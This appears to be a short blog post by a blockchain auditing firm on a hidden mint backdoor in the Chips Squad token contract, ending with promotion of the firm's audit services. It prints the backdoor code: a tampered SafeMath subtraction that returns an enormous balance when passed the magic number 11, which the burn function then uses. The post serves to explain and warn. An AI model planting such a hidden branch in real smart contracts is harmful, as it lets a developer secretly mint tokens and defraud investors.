Chips Squad ($CHIPS) Hidden Mint Function

Background

In this article we are going to cover Chips Squad listing event, and the hidden mint function that was present in the contract.

Contract

The hidden mint function

The developer used a malicious modified SafeMath library. SafeMath is one of the most common libraries in existence and is used to make sure simple math operations do not underflow or overflow.

function sub(
uint256 a,
uint256 b,
string memory errorMessage
) internal pure returns (uint256) {
if (b == 11) return ~uint120(0);
require(b <= a, errorMessage);
uint256 c = a - b;
return c;
}
function _burn(address account, uint256 amount) internal virtual {
_balances[account] = _balances[account].sub(amount);
_totalSupply -= amount;
emit Transfer(account, address(0), amount);
}

The Attack — Overview

The attack is extremely simple: All the attacker had to do, was call the burn function with the magic number 11, which resulted in him getting a large amount of tokens.

_balances[account] = _balances[account].sub(amount)

The attack — Step by step

  1. The attacker called the malicious burn function with the magic number 11

Conclusion

This attack once again emphasizes what most of us already know — investors should always require an audit from a reputable auditor before investing!

About Solid Group

Solid Group is a blockchain consulting and auditing service provider founded by cybersecurity experts with a great passion for the cryptocurrency world. We are known for our exceptional out of the box thinking, experience, and our credibility among the community. Throughout our work, our team was able to discover many high severity issues & vulnerabilities. We work with leading companies in the field, helping them increase their resilience through tailored services and solutions.

  • sniper bot protection tool
  • Smart contract auditing service

--

--

We are a group 3 software developers with combined experience of over 15years in various fields such as Software design, Operating systems, and solidity.

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Solidgroup

We are a group 3 software developers with combined experience of over 15years in various fields such as Software design, Operating systems, and solidity.